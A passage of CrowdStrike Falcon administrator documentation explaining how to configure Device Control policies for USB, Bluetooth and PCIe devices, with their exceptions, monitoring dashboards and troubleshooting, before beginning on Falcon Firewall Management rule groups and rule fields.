Click to open the policy you want to delete.
If the policy is enabled, click Disable policy.
Then click Disable policy to confirm.

Delete a policy

Follow these steps to delete a policy.

Go to Endpoint security > Device control > Device policies .
Click to open the policy you want to delete.
If the policy is enabled, click Disable policy.
Then click Disable policy to confirm.
Click Delete policy.
Then click Delete policy to confirm.

Device Control policies in multi-CID environments

If you use Falcon Flight Control, Device Control policies that you create in the parent CID are available for use globally in all child CIDs. In a child CID, you can choose which host groups are assigned to an inherited policy. Inherited Device Control policies are labeled with Global Admin on the Device policies page.

You can enable or disable policy propagation from parent to child CIDs from within a policy. Select the Policy propagation checkbox under Setting name to enable or disable this feature.

Considerations:

Aside from host group assignment, inherited policies can’t be modified in a child CID. However, you can duplicate policies inherited from the parent and then modify them as needed.
Device Control policies that are created in a child CID are fully managed in the child CID. These local policies don’t appear in the parent CID.
Locally created policies always have a higher precedence than inherited policies.
While you can manage Device Control policies for child CIDs from a parent CID, viewing child Device Control activity from a parent is not supported.

For more info about Falcon Flight Control, see Falcon Flight Control and Multi-CID Support.

Device Control policy settings

When you create a Device Control policy, you set broad rules that allow, block, or restrict devices. For USB or Bluetooth devices, you can specify the action to take based on their device class.

For example, you might create a policy to block USB mass storage drives, but permit access for other classes of USB devices. Or you might create a policy that allows some Bluetooth devices such as keyboards or headphones to connect to your network, but blocks other Bluetooth devices like printers or scanners. To create more specific rules for USB devices, see Device Control policy exceptions for guidance on how to the broad rules defined by a policy.

Integrated Bluetooth devices that do not connect using a USB dongle are only supported for Mac hosts. Bluetooth devices that use a USB dongle, such as mice or keyboards, are supported for both Windows and Mac hosts under the Wireless USB device class.

Note: Blocking isn’t supported for AirDrop devices because the protocol uses both Bluetooth and Wi-Fi. Low Energy (LE) devices, such as some earbuds, are also unsupported.

If a host moves from a group with Bluetooth device settings in place to a group that hasn’t configured Bluetooth device settings, it retains the previous settings. To avoid this, configure Bluetooth device settings for all Device Control policies that a host group may use.

Configure USB Device Control settings

When you create a USB device policy, you set broad rules that allow or block USB devices based on their USB device class. For example, you might create a policy to block USB storage drives, but permit access for other classes of USB devices.

Go to Endpoint security > Device control > Device policies .
Click Create policy.
Enter a name and optional description for your policy.
Click Create policy.
On the Settings tab, select the USB mode to use.
To include USB devices in the policy, enable the USB settings you want to apply.
1. Optional. Click to enable Enhanced file metadata collection. This setting also applies to PCIe devices.
2. Optional. Click to enable End-user notifications.
3. Select the notification to show end users when the USB device is fully blocked.
4. Select the notification to show end users when the USB device is restricted. This setting also applies to PCIe devices.
  Note: You can customize the message displayed for fully blocked and/or restricted devices. USB and PCIe mass storage full blocks will show the Access Restricted notification rather than the Full Block notification due to the way that full blocks are enforced for the Mass Storage device class.
Go to the USB devices tab.
To select the USB device classes to include in the policy, go to the USB devices tab.
1. Click to view each class you want to include.
2. Choose the permission level for each device class.
3. Optional. To add one or more exceptions for a device class, click Add exception. For more information, see Configure an exception for a USB device class.
Click Save then click Save again to confirm.
Go to the Assigned host groups tab and click Assign host groups to policy. For instructions, see Assign a Device Control policy to host groups.
After you’ve completed configuration, click Enable policy.
Tip: To expedite configuration of similar policies, click Duplicate policy to create an exact copy. Then open the copy, and edit the name, settings, permission levels, and exceptions as needed.

File Types and Execution

When the Mass Storage permission for a USB device is set to Read and write only, non-executable file types such as batch or .msi files still run. These files call to OS components like cmd.exe and msiexec.exe, which aren’t controlled by Device Control.

Block USB devices with multiple or composite classes

Some USB devices, such as multi-function printers, have multiple or composite classes. Depending on the specific classes, you can disable some or all of the device's functionality.

If a multiple-class device has mass storage, set it to Full Block to block only the storage component of the device. Other functions of the device continue to work normally. For example, if your policy blocks mass storage for a multi-function printer, the printer can't use its SD card storage, but it can continue to print normally.
If a multiple-class device doesn't have mass storage, blocking any of the device's classes completely prevents connections for that device. For example, if your policy blocks audio or video for a USB camera that also has the imaging class, the camera can't connect using USB in any way.

Configure Bluetooth Device Control settings

Note: This is only available for Mac.

Go to Endpoint security > Device control > Device policies .
Toggle to view Mac policies.
Click Create policy.
Enter a name and optional description for your policy.
Click Create policy.
On the Settings tab, select the Bluetooth mode to use.
To include Bluetooth devices in the policy, enable the Bluetooth settings you want to apply.
1. Optional. Click to enable End-user notifications.
2. Select the notification to show end users when the Bluetooth device is fully blocked.
To select the Bluetooth device classes to include in the policy, go to the Bluetooth devices tab.
1. Click to view each class you want to include.
2. Choose the permission level for each device class.
  Note: When you choose Specify minor classes, the section expands to show a list of device types within that class. From there you can select to allow or block each device type specifically.
3. Optional. To add one or more exceptions for a device class, click Add exception. For more information, see Configure an exception for a Bluetooth device class.
4. Optional. To block all other Bluetooth device types that are not explicitly included in the policy, select Full block under the Other device class.
Click Save then click Save again to confirm.
Go to the Assigned host groups tab and click Assign host groups to policy. For instructions, see Assign a Device Control policy to host groups.
After you’ve completed configuration, click Enable policy.
Tip: To expedite configuration of similar policies, click Duplicate policy to create an exact copy. Then open the copy, and edit the name, settings, permission levels, and exceptions as needed.

Full Disk Access is not enabled (macOS)

When Full Disk Access (FDA) is not enabled, Device Control policies will not behave as expected. For example, if you have full block enabled, you’ll still be able to access external devices because the external device isn’t blocked as intended. For information about the macOS sensor and FDA, see Falcon Sensor for Mac Deployment.

Internal card reader returns multiple events (macOS)

If your host has an internal card reader and you are observing multiple Device Control events for it, this behavior is expected. Multiple events occur because when the internal reader is initialized Device Control detects the initialization. This can be seen when re-plugging in an external device or when the endpoint wakes from sleep mode.

Configure PCIe Device Control settings

Configure PCIe settings, which apply to internal SD card readers and external Thunderbolt mass storage devices.

Note: PCIe settings are available only for Windows or Mac sensor version 7.29 or later. For Windows, PCIe settings apply only to internal SD card readers and hosts. For Mac, PCIe settings apply to both internal SD card readers and external Thunderbolt mass storage devices.

While PCIe devices have a dedicated monitoring mode and access permissions, PCIe settings for metadata collection and access restriction notifications are shared with USB devices for a particular policy.

Note: SD cards that are plugged into a USB external SD card reader will continue to be controlled by USB device settings.

Go to Endpoint security > Device control > Device policies .
From the Platform menu, select your platform.
Edit or create a policy.
- To edit a policy, click the policy name.
- To create a policy, click Create policy, enter a name, and then click Create policy.
On the Settings tab, select the PCIe mode to use.
Optional. Enable metadata collections and notifications in the USB and PCIe area.
1. Select Enhanced file metadata collection.
2. Select End-user notifications.
3. For the Access restriction notification setting, select whether to show the default message or a custom message. If needed, enter a custom message.
  
  Note: The Full block notification setting doesn’t apply to internal SD card readers or external Thunderbolt mass storage devices.
4. Click Save.
Click the PCIe devices tab.
Expand the Mass Storage section.
On the SD cards tab, select the permission level.
For Mac policies, click the Thunderbolt tab and select the permission level.
Click Save.

Device Control policy exceptions

You can create exceptions for USB and Bluetooth devices to override the standard behavior of a policy.

For example, you might create a policy that blocks all USB mass storage devices, then create exceptions for the specific USB devices that are issued and approved by your organization. Exceptions are based on:

device class/subclass
Vendor source
vendor ID (VID)
product ID (PID)
serial number

Note: Bluetooth devices do not have serial numbers. USB devices do not have vendor sources.

It's possible to set a class's exception permissions to the same behavior as the class's permissions. If the class's permissions are changed in the future, the exception's permissions remain the same.

Exceptions are applied according to the following precedence from highest to lowest:

Includes Vendor ID, Product ID, and Serial number
Includes only Vendor ID and Product ID
Includes Vendor ID and a specific device class
Vendor ID only
Device class or minor class only

Note: When you use manual entry, exceptions that include more information automatically override exceptions that contain less information.

When entering a vendor name or product name, you might find an entry that corresponds to an incorrect vendor ID or product ID. When Falcon looks up vendor and product names, it checks several third-party lists. You may update the vendor and product names to your own custom values. As long as the vendor source, vendor ID, product ID and/or serial number match the device, the exception works as expected.

Note: Policy exceptions are not supported for internal SD card readers or external Thunderbolt mass storage devices.

Configure an exception for a USB device class

To create exceptions at the device class level, follow these steps.

Go to Endpoint security > Device control > Device policies .
Go to the USB devices tab.
Click to expand the USB device class you want.
Click Add exception.
Choose the method for creating the exception using a USB device's Combined ID or Manual entry.
- Combined ID:
  1. Enter the combined ID.
  2. Confirm the device class selection.
  3. Choose the permission level.
  4. Optional. Select whether to make the exception temporary. For more information, see Temporary exceptions.
  5. Optional. Enter a description.
- Manual entry:
  1. Enter the Vendor ID and Vendor name.
    Note: If your vendor isn’t available in the dropdown, you can enter a custom vendor name. The vendor name doesn’t affect the exception's functionality.
  2. If available, enter a Product ID and Product name.
    Note: If the product name isn’t available in the dropdown, you can enter a custom product name. The product name doesn’t affect the exception's functionality.
  3. Optional. To allow the use of wildcards in serial numbers, select Allow wildcards.
    Note: This feature is available for macOS and Windows sensor 6.56 and later. For more information, see Use wildcards to include multiple USB devices.
  4. Enter a device serial number or, use a wildcard value using glob syntax to include a block of serial numbers. Accepted glob syntax include *, ?, and []. To escape a wildcard character, add square brackets around the character you’d like to escape, for example [*]. For more info, see Glob Syntax.
  5. Optional. To confirm that the wildcard works as expected, enter a sample serial number value in the Serial Number for Glob Pattern Test field and click Test.
  6. Confirm the device class selection.
  7. Select the permission level.
  8. Optional. Enter a description.
  9. Optional. Select to make the exception temporary and enter an end date and time.
Click Add exception.
Click Save and then click Save again to confirm.

Temporary exceptions

Temporary exceptions expire at a scheduled end date and time and are then automatically deleted from the policy. They are scheduled in local time in the UI, but if using Device Control Policy APIs, they should be scheduled in UTC. The date and time set is when the channel file update is sent to the sensor to remove the exception. Depending on your policy update settings, it might take some time before an expired exception is no longer in effect.

Note: When viewing policy exceptions, the End time column that shows a temporary exception’s expiration date and time is not visible in the table by default. You can enable the column header from the Toggle table column menu in the upper-right corner of the table.

Use wildcards to include multiple USB devices

If your serial numbers follow a predictable pattern, you can use a wildcard value to add multiple devices to a policy exception and reduce the total number of exceptions you’ll need to create. To enable the use of glob wildcards and match patterns in text strings, select the Manual Entry option.

Note: There is a limit of 15,000 exceptions per (USB) policy. We recommend reducing your exception count by using wildcard serial numbers whenever possible.

Configure an exception for a Bluetooth device class

Note: Bluetooth devices might have a Vendor ID assigned with a vendor source of either USB or Bluetooth. Exceptions added using the dashboard located at Endpoint security > Device control > Activity automatically populate the vendor source when it is available. We recommend using this dashboard to add exceptions when possible.

To create exceptions at the device class level, follow these steps.

Go to Endpoint security > Device control > Device policies .
Go to the Bluetooth devices tab.
Expand the Bluetooth device class you want.
Click the Exceptions tab for your device class.
Click Add exception.
1. Enter the Vendor source.
  Note: The vendor source field designates which organization assigned the value used in the Vendor ID field value, usually either the Bluetooth SIG or the USB Implementer’s Forum. In Device Control, you’ll see these options appear as Bluetooth or USB in the Vendor source dropdown. For more info, see section 3.9.1.1 of the Bluetooth Device Information Service 1.1 specification. If you are unsure of the vendor source, choose Any.
2. Enter the Vendor ID and Vendor name.
  Note: If your vendor isn’t available in the dropdown, you can enter a custom vendor name. The vendor name doesn’t affect the exception's functionality.
3. If available, enter a Product ID and Product name.
4. Confirm the device class and minor class selection.
5. Select the permission level.
6. Optional. Enter a description.
7. Optional. Select to make the exception temporary and enter an end date and time.
Click Add exception.
Click Save and then click Save again to confirm.

Configure an exception based on event type

To create exceptions at the individual event level, follow these steps.

Go to Endpoint security > Device control > Activity .
On the Device control tab, locate the event to use and click .
Select Add exception.
Select the device class to include.
Choose the permissions.
Optional. Select to make the exception temporary and enter an end date and time.
Enter a description.
Click Add to policy.

Configure a CID-wide USB device exception

CID-wide device exceptions apply to the entire CID they’re created for, regardless of platform. They always override policy-specific exceptions. Only USB CID-wide device exceptions are supported at this time. CID-wide exceptions follow the enforcement mode of the Device Control policy the host is assigned to. For example, if a host’s policy is set to Off, the CID-wide exception will not apply.

You can create a CID-wide exception based on a combined ID from the Device Control dashboard, or manually create one by adding device information.

To create exceptions at a CID-wide level, follow these steps.

Go to Endpoint security > Device control > Device policies .
Click the CID-wide exceptions tab.
Click Add exception.
Select Combined ID or Manual entry.
1. If you select Combined ID, add the Combined ID.
2. If you select Manual entry, add the device information. For more info about manual entry, see Configure an exception for a USB device class.
Select the Device class and Permissions.
Add a Description.
Click Add exception to save.

Monitor Device Control activity

Depending on your primary Falcon subscription, Device Control provides several dashboards in the Falcon console that enable you to review USB and Bluetooth device connection events in your environment.

Activity
Device usage (Falcon Insight XDR only)
Device usage by host (Falcon Insight XDR only)
Device blocks (Falcon Insight XDR only)
Files written to devices overview (Falcon Insight XDR only)
Files written to USB
Monitoring policy (Falcon Insight XDR only)
Mac Bluetooth device usage (Falcon Insight XDR only)
Mac Bluetooth device blocks (Falcon Insight XDR only)
Mac Bluetooth device monitoring policy (Falcon Insight XDR only)

To download any of these dashboards, click Export.

Activity dashboard

Go to Endpoint security > Device control > Activity .

This dashboard provides a list of all instances of supported removable and Bluetooth devices connecting to hosts in your environment. Click an event to open a detailed view that and includes the following information:

Details about the device, such as its device name, vendor name, and IDs
Details about the specific host the device attempted to connect to
The action taken (allowed or blocked)
The associated Device Control policy

Note: You can add a policy exception from this location for USB and Bluetooth devices. For more information, see Configure an exception based on event type.

You might see an event with Event Type of Device Not Supported on the Activity dashboard.

This event type means an external device that is potentially incompatible with the Device Control module was detected. As a result, Device Control can't take any actions on the device. An associated event is logged in the Falcon console for visibility.

Also, the device might run into compatibility or other issues that prevent it from functioning correctly. If such an issue occurs, contact Support for further investigation and possible remediation.

For Mac hosts running Sonoma and later, Apple requires the end user to authorize third-party applications to access Bluetooth. This permission cannot be manageable by MDM. The Bluetooth permissions tab lists the Bluetooth authorization status of these Mac hosts. If an end user hasn’t granted Falcon the required permission to apply your Device Control policies, your admin will not be able to view Bluetooth events or apply Bluetooth policy. Click an event to view more information about the event and its associated policy.

Note: Bluetooth support is only available for macOS.

Device usage

Discover information about supported devices in your environment at Endpoint security > Device control > Device usage . If you have Device Control with Falcon Pro or Falcon Prevent without Insight, go to Endpoint security > Device control > Activity .

The Device Usage dashboard shows all device activity in your environment. To narrow the results, add filters based on any of the available fields. Depending on the size of your environment, changing the time range can result in a search that takes some time to complete.

Note: This search feature doesn’t support wildcard serial numbers.

You'll also use this information when you create exceptions in USB device policies. When creating exceptions, you identify USB devices by their vendor IDs (VIDs), product IDs (PIDs), and serial numbers. We recommend using the USB device dashboards to get accurate information, but you can also use another source of USB devices' VIDs, PIDs, and serial numbers.

Device events

To view removable device events go to Endpoint security > Device control > Device usage .

By default, the Device usage dashboard shows all instances of supported devices connecting to your hosts. You can filter these events with the filter bar at the top.

Filter Option	Description
Policy mode	Enforce: view events associated with policies set to Monitor and Enforce mode Monitor only: view events associated with policies set to Monitor only mode A value of N/A indicates that the removable device was allowed to connect (the Full access permission).
Permissions	View events that resulted in a selected action, based on the Permission setting in your Device Control policy. Read only and Read and write only appear only for devices with the mass storage device class.
Policy name	View events associated with a specific Device Control policy. A value of N/A indicates that the removable device was allowed to connect (the Full access permission).
Device class	The device class of the device. This is set by the device manufacturer.
Vendor name	The manufacturer of the removable device. This is set by the device manufacturer.
Product name	The product name for the device. This is set by the device manufacturer.
Event type	View whether the device was connected or blocked.
Event time	The time the device attempted to connect. This time is recorded in UTC but displayed according to your user profile’s time setting.

Device Usage by Host

Use this dashboard to view all of the supported devices that are associated with a single host. Enter a host name to view its history. To view this dashboard, go to Endpoint security > Device control > Device usage by host .

Device blocks dashboard

This dashboard shows instances of devices that were blocked by a Device Control policy set to Full Block on any host in your environment. Instances of mass storage devices using policies set to Read only or Read and write only aren't included. This dashboard helps you determine whether your Device Control policies are blocking devices as intended. To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed. To view this dashboard, go to Endpoint security >Device control > Device blocks .

Monitoring Policy Dashboard

The Monitoring Policy dashboard shows instances of supported removable devices that match a Device Control policy set to Monitor only. These devices were allowed to connect to a host, but if your policy was set to Monitor and enforce, they would have been blocked. This dashboard helps you test a Device Control policy without affecting users and hosts. To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed. To view this dashboard, go to Endpoint security > Device control > Monitoring policy .

Mac bluetooth device usage dashboard

If you have Device Control with Falcon Insight XDR, go to Endpoint security > USB device control > Mac bluetooth device usage .

The Mac Bluetooth device usage dashboard shows all Bluetooth device activity on your Mac hosts. To narrow the results, add filters based on any of the available fields. Depending on the size of your environment, changing the time range can result in a search that takes some time to complete.

Mac bluetooth device blocks dashboard

This dashboard shows instances of devices that were blocked by a device policy set to Full Block on any host in your environment. This dashboard helps you determine whether your device policies are blocking Bluetooth devices as intended. To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed.

To view this dashboard, go to Endpoint security > Device control > Mac bluetooth device blocks .

Mac bluetooth monitoring policy dashboard

The Mac bluetooth monitoring policy dashboard shows instances of Bluetooth devices that match a policy but weren’t blocked because the policy is set to Monitor only. If the policy is set to Monitor and enforce, these devices would be blocked. Use this dashboard to determine how Bluetooth settings affect users and hosts before you enforce those settings.

Note: To narrow your results, apply filters to any of the fields. Depending on the size of your environment, changing the time range can impact how quickly results are displayed.

To view this dashboard, go to Endpoint security > Device control > Mac bluetooth monitoring policy .

Files written to removable media overview

The Files written to removable media overview dashboard shows files that have been written to removable devices which helps you identify the specific files written from a host. To view this dashboard, go to Endpoint security > Device control > Files written to removable media overview . To narrow your results use the File Type drop-down list.

The following file types are reported in the Files written to devices overview dashboard.

File Category	File Type
File Archive	7Zip ARC ARJ BZ2 CAB DEB GZIP JAR RAR RPM TAR XAR ZIP
Document	DOCX MS DOCX MS PPTX MS XLSX MSVSDX OLE OOXML PDF PPTX RTF VSDX XLSX
Design	DWG DXF IDW
Multimedia	BMP GIF JPEG PNG TIFF
Source Code	SCRIPT
Executable	CAB CLASS ELF MACHO MSI PE
Virtual Machine	VDI VMDK
Email	EMAIL EMAILARC EML MSG OST PST
Data and Logs	BLF DMP ESE
Other	DMGLNK

You can narrow your search by entering a computer name, user name, file path or name, file type, or company. Depending on the size of your environment, changing the time range can result in a search that takes some time to complete.

Files written to USB dashboard

Available to Falcon Prevent and Falcon Insight XDR customers with Device Control, the Files written to USB dashboard provides detailed information about file activity with contextual metadata that enables you to investigate potential data exfiltration events. File written data is retained for 30 days.

Note: This dashboard does not support file write details for internal SD card readers or Thunderbolt mass storage devices.

To enable this feature, go to Endpoint security > Device control > Device policies and turn on Enhanced file metadata collection. Consider these points when using this feature:

Enabling the Enhanced file metadata collection feature initiates three Falcon sensor servlet containers on managed hosts. We recommend testing the feature within your environment before enabling it on hosts with very high I/O workloads.
Although Enhanced file metadata collection applies to both USB and PCIe mass storage devices and is viewable in Event Search, the Files written to USB dashboard shows only files written to USB mass storage.

To view the Files written to USB dashboard, go to Endpoint security > Device control > Files written to USB .

Filter option	Description
Date Written	Date and time the file write event
Filename	Full name of file written
Given File Extension	Extension for file written
Identified file type	File type based on file structure and content analysis
Identified file category	Identified file category such as archive, document, and multimedia
Host filepath	The full source file path detected on the managed host
USB device	USB device type
Combined ID	USB device unique identifier
Username	Identified user attached to the file write event
Hostname	Name of the host where the file write event was observed

Note: There might be a short delay in the availability of file provenance data for new files transferred onto removable media.

Use the search feature to narrow your results. Search by computer name, username, file path or name, file type, or company. Depending on the size of your environment, changing the time range can impact how quickly results are displayed.

Click an event in the dashboard to view more detailed information.

Detailed view	Information included
Related USB session	Falcon sensor creates a unique session ID based on when the removable storage device was inserted. files and data written during the session date and time of the first file written date and time of the last file written Select View full session to show all files covered by the USB session.
File	file size given file extension identified file type identified file category SHA25 application writing the file Microsoft Purview sensitivity label Note: File source information is available for files under the `C:\Users\` directory, which typically incorporates the library folders for all users.
Archive	This information is shown instead of file details when an archive file type is detected. filename file size number of files in the archive given file extension identified file type identified file category SHA256 application writing the file Microsoft Purview sensitivity label Select View filenames, to view more details about individual files contained in the archive. You can export these details to a CSV file.
USB device	device type date and time device first seen device class vendor device serial number and combined ID For Disk Images which can function as a USB Device on macOS the following fields are available: Disk Image Path GUID BSD device
User	username user ID logon type logon time logon server logon domain
Host	operating system IP address local IP address host ID sensor version containment status

Note: Archive file introspection for ZIP files is limited to the first 100MB of the ZIP file. If the archive includes more than 50 files, only the top 50 files, prioritized by file type and size, are scanned. File names might not be available for some password protected ZIP files.

Use Device Control events as workflow triggers

Orchestrate automated actions triggered by Device Control events in Falcon Fusion SOAR. To reach your workflows, go to Fusion SOAR > Fusion SOAR > Workflows .

To use a Device Control event as a workflow trigger, edit the trigger for an existing workflow or create a new workflow.

In the Add trigger panel:

Select either Device control event or File written event and click next.
In the workflow, add conditions and actions based on the trigger’s event details and complete the workflow.

For more information, see Fusion SOAR.

Troubleshooting

If the Device Control policy isn't working as expected for a supported removable or Bluetooth device, follow these steps to troubleshoot the issue.

On a Windows host, confirm that the sensor rebooted after an install or after the Device Control policy was enabled.
Verify that the host belongs to a group with the Device Control policy assigned.
Confirm that there isn’t a higher precedence policy assigned to the host's group.
Confirm that the Device Control policy is enabled.
Confirm that the Device Control policy is set to Monitor and enforce.
Verify that the Device Control policy is configured to allow or deny access correctly.
Confirm that there aren’t any exceptions which specify different behavior for that device class.
Confirm that there isn’t a more specific exception applied to the host.
Confirm that you entered a combined ID or manual entry in the correct device class.
If you entered an exception with a combined ID, confirm that the combined ID is correct.

Vendor name or product name are incorrect

When entering a Vendor Name or Product Name, you might find an entry that corresponds to an incorrect Vendor ID or Product ID. When Falcon looks up vendor and product names, it checks several third-party lists.

Device not supported event type

You might see an event with an event type of Device not supported at Endpoint security > Device control > Activity .

This event type means an external device that is potentially incompatible with the Device Control module has been detected. As a result, the Device Control module can't perform any actions on the device, such as blocking or allowing the device. An associated event however is logged in the Falcon console for visibility.

Also, the device might run into compatibility issues or other issues and not be able to function correctly. If such an issue occurs, contact Support for further investigation and possible remediation.

Additional errors

When an external storage device is connected to the host the following dialog will appear:

screenshot of macos message that the disk you attached was not readable by this computer

This popup is expected and occurs when device permissions are set to Full Block for Mass Storage devices. This occurs because a file system was unable to be mounted because Device Control imposed restrictions.

When you have Mass Storage permission set to Read Only and you attempt to write to the external storage device, a username/password prompt will appear. After entering in your credentials the following dialog will appear:

screenshot of macos message that says items cant be copied because you dont have permission to read them

The username/password prompt and the follow-up dialog is expected behavior for some applications. If the application is unable to write with the current user credentials, it will request alternative user credentials. This behavior is not controlled by Device Control, it is application specific.

Falcon Firewall Management

Centrally manage the firewalls on your Windows and macOS hosts in the Falcon console.

Overview

Centrally manage the firewalls on your Windows, macOS, and Linux hosts from Falcon console using Falcon Firewall Management, based on the Windows Filtering Platform or CrowdStrike platform (for macOS and Linux). Secure your hosts from network threats by allowing or blocking network traffic in accordance with your organization’s policies.

Before you begin

Firewall policies are enforced on hosts by using host groups. For info about creating host groups, see Host and Host Group Management.

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

Requirements

Subscription: Falcon Firewall Management

Sensor Support:

Windows

Falcon sensor for Windows version 6.33 and later. Sensor version 6.42 or later is required for wildcard support.

Note: If a Falcon firewall policy is applied to a host running an earlier sensor version, the host will have a firewall policy state of pending changes until it updates to a sensor that supports Falcon firewall management.

macOS

macOS support: Big Sur 11.4 and later
Support for Advanced Protocols: For info, see Support for advanced protocols on macOS hosts
ICMP connections: To block incoming ICMP connections, enable stealth mode in macOS System Preferences

Linux

Sensor support: Falcon sensor for Linux version 7.27 and later, running in user mode

Note: If a Falcon firewall policy is applied to a host running an earlier sensor version, the host will have a firewall policy state of pending changes until it updates to a sensor that supports Falcon firewall management.
Linux support: Supported Linux distros with Linux kernel 5.13 and later

Note: Alma Linux, RHCK, RHEL, Rocky Linux require version 8.7 and later

Roles:

Firewall Manager: Create and edit firewall rules, assign firewall rule groups to firewall policies, and assign firewall policies to host groups.

Note: The Firewall Manager role doesn’t include the ability to create and edit host groups themselves. The Falcon Administrator role is required for host group management.
These roles can view firewall rules, rule groups, policies, and audit logs:
- Falcon Administrator
- Falcon Analyst
- Falcon Analyst - Read Only
- Falcon Investigator
- Falcon Security Lead

Understand Falcon Firewall Management

With Falcon Firewall Management, create firewall rules, rule groups, and polices to precisely define what network traffic is allowed and blocked. When enforced, Falcon’s firewall policies override the firewall settings on each assigned host.

Rules: Individual firewall rules define precise network traffic that is allowed or blocked and whether you want to see associated events in the console.

Rule groups: Use firewall rule groups to organize firewall rules. You can start with an empty group and build it out. If you need a template, you can duplicate an existing CrowdStrike template rule group and customize it to meet your needs. For more info, see CrowdStrike Core Windows Networking Firewall Rules.

Note: You do not need to add core networking rules to your firewall policies. They are provided as an example of a rule group. These rules are already added to every firewall policy by default.

Policies: Use policies to enforce firewall rules. You assign rule groups to a policy and then configure the policy to allow or block any remaining network traffic that is not defined by the rules in its rule groups.

Rule groups can be assigned to multiple firewall policies.
Firewall rule groups are enforced in the precedence order you define within a policy.

Firewall policies work like other Falcon policies:

They are applied to individual hosts through host groups.
Policy precedence handles situations where a host is assigned to more than one policy.
To affect assigned host groups, they must be enabled.

Implementation overview

Implementing a set of Falcon firewall rules and policy to secure your hosts from network threats involves these key steps:

Plan and prepare

Map your organization’s firewall requirements to Falcon Firewall Management rules.
Determine the network traffic you need to allow, block, and review.
Decide how you want to organize your rule groups.
Make sure you have host groups that are aligned with how you need to apply firewall policies.

Create firewall rule groups and rules

Create firewall rule groups to logically group firewall rules
Define the traffic you will allow and block in your firewall rules
Enable your rules and rule groups

Assign host groups and enable firewall policies

Assign firewall policies to test host groups
Enable the firewall policy

Test and Troubleshoot

We recommend you always test new firewall rules on a small set of test hosts, such as in a lab or QA environment, and start simple with a single rule group and policy. Be as specific as possible about the network traffic you allow, and block everything else. Test and troubleshoot to confirm the desired behavior before building out the policy or applying it to a production environment.

Falcon provides two options to report firewall events in Endpoint security > Firewall > Activity during testing:

At the individual rule level, turn on Watch mode to report all matching traffic.
At the policy level, temporarily turn on Monitor mode to allow traffic that would normally be blocked by the policy and report all associated events.

Rollout/Go Live

Build out your firewall rule groups, rules, and policies.
Assign policies to host groups.
Enable the policies.

Important: Improper implementation of firewall rules can cause a major issue that requires manual remediation. Always be aware of the potential impact Firewall rules might have on your environment.

CrowdStrike has certain safeguards in place to reduce the risk:

Protecting key connections between the Falcon sensor and cloud
Protecting not blocking loopback connections
Including core rules in every firewall policy

Manage your firewall rules and rule groups

View your firewall rule groups and rules

Go to Endpoint security > Firewall > Rule groups to see your firewall rule groups.

Click the name of a rule group to view its details.

Create a firewall rule group

To begin setting up your organization’s firewall in Falcon console, create a rule group.

Go to Endpoint security > Firewall > Rule groups.
Click Create rule group.
Enter a name, platform type, and description, and then click Create.
There are 3 options to start a new firewall rule group. Start from scratch, duplicate an existing rule group, or choose a template. Select an option and click Create rule group.
- Empty rule group: Makes a new group that contains no rules
- Duplicate an existing rule group: Copies an existing firewall rule group and its firewall rules
- CrowdStrike preset rule group templates: Makes a rule group with our collection of core rules. For more info, see CrowdStrike Core Windows Networking Firewall Rules.
Your firewall rule group is created, and you see the Rules tab of its Rule group details.
Create or edit rules in the group. For more info, see:
- Create new firewall rules
- Edit the rules

Editing a firewall rule group’s basic info

You can edit the name, status, and description of a rule group at any time.

Go to the Endpoint security > Firewall > Rule groups page and click the name of the rule group you want to edit.
Configure the changes and click Save.

Create a firewall rule

The details of firewall settings are defined in individual rules, created within rule groups. To add a rule:

Go to the Endpoint security > Firewall > Rule groups page.
Click the name of the rule group where you’ll add the new rule.
On the Rules tab, click Add rule.
In the Add rule dialog, define the rule. For info about the fields, see firewall rule dialog fields.
To configure a rule for executables with dynamic file paths, include a wildcard in the Executable Filepath field. To confirm that the wildcard works as expected, enter a URL in the Test String field.
Click Add rule.

Edit a rule

You can edit all existing firewall rule parameters. Review firewall rule versions and rule IDs for information about what changes when edits are made.

Go to Endpoint security > Firewall > Rule groups and click the name of the rule group to view its details.
On the Rules tab, click the open menu icon of the rule you want to edit.
Click Edit rule to see and edit the rule.
Make your changes in the firewall rule dialog fields and click Save. For more info, see Firewall rule dialog fields.

Firewall rule dialog fields

Name: Give this Firewall rule a name that is recognizable when viewing rules in Firewall Rule Groups and Firewall Policies.

Description (optional): Enter information such as the rule’s purpose.

Address Type: Select an option:

FQDN: Allows you to list one or more fully qualified domain names (FQDN) in the Remote Address field. FQDNs can be used only for outbound rules. Inbound and bidirectional rules are not supported. URLs containing subdirectories, for example testing.com/api are not supported.
- Wildcard FQDNs, for example *.zoom.us, are supported using glob syntax. For more information, see Glob Syntax.
- Enter a desired FQDN in the FQDN to Test Against Above Pattern (Optional) field and click Test.
- Examples of valid FQDNs:
  - www.example.com
  - example.com
  - abc.def.example.com
  - [a-z]xample.com
- Examples of invalid FQDNs:
  - example.com/api
  - exa**mple.com
- www.example.com and example.com may resolve to two different IP addresses. To ensure that both FQDNs are included in your rules, we recommend creating two rules, one for *.example.com and one for example.com.
  - When two distinct FQDNs resolve to the same IP address, blocking one FQDN automatically blocks the other. For example, if www.example1.com and www.example2.com resolve to the same IP address, creating an FQDN rule to block www.example1.com will also block www.example2.com.
- While the use of FQDN-based rules is generally reliable, due to the nature of the network protocols involved, it isn't possible to guarantee that FQDN rules cannot be circumvented in all cases.
  - If absolute certainty is required, rules should be alternatively configured by IP address, or restricted by policies, to ensure internet traffic cannot be proxied and that DNS resolution cannot be circumvented.
- FQDN rules may not work if your browsers have Secure DNS/DNS over HTTPS enabled. For information on how to disable Secure DNS/DNS over HTTPS, see documentation for Microsoft Edge, Chrome and Firefox.

Note: FQDN is not supported for Linux.

IP address: Allows you to list one or more IP addresses in the Local Address and Remote Address fields.

Platform: Windows, macOS, and Linux

Address Family: Your selection determines how address formats you enter in the Local Address and Remote Address fields are parsed and validated.

If you are creating a rule that defines addresses, select the family address you’re using:
- IPv4
- IPv6
Select Any if you’re creating a rule for ports only, with IP address type, or with FQDNs only, with FQDN address type. Any rules will apply to both IPv4 and IPv6 traffic.

Protocol: Define network protocols. You can select multiple options:

Any
TCP
UDP
ICMPv4
IGMP
IP-in-IP
IPv6 Encapsulation
GRE
ICMPv6

Note: macOS doesn't have visibility into and cannot block SSH connections.
Advanced

When you select Advanced, the Protocol Number field is made available so you can enter the next level protocol, also known as the transport layer protocol:

